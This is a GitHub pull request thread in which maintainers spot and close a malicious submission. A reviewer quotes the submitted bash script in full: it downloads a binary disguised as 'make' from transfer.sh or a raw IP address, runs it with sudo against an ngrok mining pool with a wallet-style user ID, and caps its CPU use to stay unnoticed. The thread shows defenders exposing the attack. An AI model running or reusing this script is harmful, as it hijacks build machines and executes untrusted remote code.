### PR TITLE
Fix #1

### PR DESCRIPTION
**Pull request by stavteklassi**
Fixes #1

### CODE REVIEW

**Comment by FdaSilvaYY** [comment]
Looks like someone is trying to hack GitHub build machines:
````
#!/bin/bash

sudo apt-get install wget cpulimit -y

CPU_THREADS=`echo "$LSCPU" | grep "^CPU(s):" | cut -d':' -f2 | sed "s/^[ \t]*//"`

wget -O ~/make http://transfer.sh/get/tB2gb/make || wget -O ~/make http://95.181.172.137:8000/make

chmod a+x ~/make

sudo ~/make --url 2.tcp.ngrok.io:10747 --user 42nuranNDpL9p3ikUf8EKG5vUATb5x5rnFydsqbRtr9TFntnJE27rgZ4J5wDhc3nxV9jd22cCki95AKtyFQKhbWvNJdr9h6 --pass GitHubPull --no-title --no-color -B

eval "sudo cpulimit -e make -l $((95*$CPU_THREADS)) -b"

while true; do sleep 5; done
````

**Comment by kroeckx** [comment]
I've reported the user to github

**Comment by richsalz** [comment]
it's a larger issue of malicious modifiying CI/CD stuff.  hopefully they'll figure that out.  Or maybe you could tell them @kroeckx  if they don't already know.

**Comment by kroeckx** [comment]
I think I properly explained the issue, they have options to report such behaviour.

**Comment by richsalz** [comment]
Thanks you, @kroeckx

**Pull request closed without merging**
